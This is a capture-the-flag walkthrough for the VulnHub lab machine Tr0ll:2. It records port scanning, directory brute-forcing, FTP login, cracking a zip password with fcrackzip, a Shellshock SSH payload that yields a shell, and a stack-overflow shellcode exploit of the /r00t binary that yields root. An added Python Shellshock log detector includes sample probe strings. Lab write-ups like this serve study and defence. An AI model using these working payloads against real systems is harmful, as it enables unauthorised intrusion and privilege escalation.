VulnHub Lab Series 10 - Tr0ll:2

Target: Tr0ll: 2 ~ VulnHub
Difficulty: 5.5 / 10.0

This article briefly records each step of compromising the target machine. Not every step is described in full detail, and some of the content may be wrong; readers are welcome to point out mistakes, thank you!

Summary: the scan shows ports 21, 22 and 80 open. Starting from the HTTP service on port 80, browsing the pages yields a username and a file. The FTP service on port 21 then yields an encrypted zip archive, which is cracked with fcrackzip; inside is a private key file. The Shellshock vulnerability is used to obtain a low-privilege user, and pwning the /r00t program in the target directory finally yields root.

Still to be filled in: how the Shellshock vulnerability works, the basic PWN workflow, and gdb usage.

Host Discovery & Port Scanning

Target IP: 192.168.1.11

Port scan results:

hhh@Kali2020:~$ sudo nmap -A -sS -sV -p- -T5 192.168.1.11
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-02 16:51 CST
Nmap scan report for tr0ll2 (192.168.1.11)
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
|   2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_  256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:B3:C1:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.36 ms tr0ll2 (192.168.1.11)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.64 seconds

Information Gathering

Port 80: HTTP service

Hidden information is found in the homepage source:

<!--Nothing here, Try Harder!>
<!--Author: Tr0ll>
<!--Editor: VIM> 

Opening robots.txt reveals a long list of directories. Save the file and use it as a wordlist for dirb:

wget http://192.168.1.11/robots.txt
dirb http://192.168.1.11 robots.txt

Four of the directories turn out to actually exist (the doubled slash in the URLs comes from the leading slash on each robots.txt entry):

---- Scanning URL: http://192.168.1.11/ ----
+ http://192.168.1.11//noob (CODE:301|SIZE:311)
+ http://192.168.1.11//keep_trying (CODE:301|SIZE:318)
+ http://192.168.1.11//dont_bother (CODE:301|SIZE:318)
+ http://192.168.1.11//ok_this_is_it (CODE:301|SIZE:320)

Copy the image from each page and analyze them one by one. The image in the /dont_bother directory contains a hint:

> strings dont_bother.jpg
Look Deep within y0ur_self for the answer

Going to the /y0ur_self directory, there is a text file consisting entirely of base64 strings. Download it and base64-decode it directly:

wget http://192.168.1.11/y0ur_self/answer.txt
base64 -d answer.txt > decode.txt

Port 21: FTP service

Following the first hint above, log in with Tr0ll as both the username and the password. The directory contains an lmao.zip; download it, but extracting it requires a password:

hhh@Kali2020:~$ ftp 192.168.1.11
Connected to 192.168.1.11.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.1.11:hhh): Tr0ll
331 Please specify the password.
Password:
230 Login successful.

ftp> dir
-rw-r--r--    1 0        0            1474 Oct 04  2014 lmao.zip
226 Directory send OK.

ftp> get lmao.zip 

Use fcrackzip to brute-force the password, with the decode.txt just obtained as the wordlist:

hhh@Kali2020:~$ fcrackzip -u -D -p decode.txt ./lmao.zip 

PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL

-u: only show the password that was actually cracked
-D: specify the dictionary file
-p: use the given string as the initial password / password file

Extracting the archive yields a file named noob; inspecting it shows that it is a private key file:

> file noob
noob: PEM RSA private key

Gaining Access

Connect using the private key:

hhh@Kali2020:~$ ssh -i noob noob@192.168.1.11
load pubkey "noob": invalid format
TRY HARDER LOL!
Connection to 192.168.1.11 closed.

After echoing a single message, the server closes the connection.

This is where the Shellshock vulnerability comes in:
Shellshock OpenSSH restricted shell RCE/PE Proof of Concept – Zdziarski's Blog of Things
Practical Shellshock Exploitation – Part 1 - Infosec Resources (infosecinstitute.com)

The payload is as follows (not sure whether it can really be called a payload here):

ssh -i noob noob@192.168.1.11 -t "() { :;}; /bin/bash"

Low-privilege access is obtained.
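As an added example (not part of the original write-up), the following Python detector scans log events for the Shellshock function-export prefix `() {` that the ssh payload above relies on, and extracts the command appended after the function body for incident response. The Apache and sshd-wrapper lines below are constructed for the demo, not taken from the target machine.

```python
import re
from typing import List, Optional, Tuple

# Bash function-definition prefix that triggers CVE-2014-6271 ("Shellshock"):
# "() {" followed by a body, then the trailing commands that unpatched bash
# executes. Bash tolerates whitespace between the tokens, so the pattern does too.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample events (not from the target machine): an Apache access-log
# line with the probe in the User-Agent, a benign request, sshd-style entries as a
# ForceCommand wrapper might log SSH_ORIGINAL_COMMAND, and a CVE-2014-7169 variant
# whose function body is never closed.
SAMPLE_EVENTS = [
    '192.168.1.50 - - [02/Feb/2021:16:55:01 +0800] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash -c id"',
    '192.168.1.50 - - [02/Feb/2021:16:55:02 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'sshd[1234]: wrapper: user=noob SSH_ORIGINAL_COMMAND="() { :;}; /bin/bash"',
    'sshd[1235]: wrapper: user=noob SSH_ORIGINAL_COMMAND="ls -la"',
    'app: stored value "() {(a)=>\\" seen in config',
]


def is_shellshock_probe(text: str) -> bool:
    """Return True when text contains the '() {' function-export prefix."""
    return SHELLSHOCK_RE.search(text) is not None


def extract_trailing_command(text: str) -> Optional[str]:
    """Return the command bash would run after the function body, if any.

    Unpatched bash stops parsing at the closing '}' and executes whatever
    follows; that tail is what an incident responder wants recorded.
    Returns None when the body is not closed or nothing follows it."""
    m = re.search(r"\(\s*\)\s*\{[^}]*\}\s*;?\s*(.*)", text)
    if not m:
        return None
    tail = m.group(1).strip().rstrip('"')
    return tail or None


def scan_events(events: List[str]) -> List[Tuple[int, Optional[str]]]:
    """Return (event_index, trailing_command) for every matching event."""
    return [(i, extract_trailing_command(ev))
            for i, ev in enumerate(events) if is_shellshock_probe(ev)]


if __name__ == "__main__":
    for idx, cmd in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: shellshock pattern, trailing command: {cmd!r}")
```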

Privilege Escalation

In the /nothing_to_see_here directory there is a program named r00t; pwning it yields root. See the reference below for the detailed analysis.

Reference: Vulnhub.com — Tr0ll2 CTF Walkthrough | by Leigh | SecurityBytes

The payload is as follows:

noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

Summary

  1. ftp commands
  2. cracking archive passwords with fcrackzip
  3. the Shellshock vulnerability
  4. PWN study
  5. gdb usage

References

Vulnhub.com — Tr0ll2 CTF Walkthrough | by Leigh | SecurityBytes

No.9-VulnHub-Tr0ll:2-Walkthrough penetration study notes (Dayu)

vulnhub-writeup/kapi-note.md at master · zionspike/vulnhub-writeup · GitHub

Arrays - Bash Scripting Tutorial - WangDoc

Original article: https://www.cnblogs.com/labster/p/14371468.html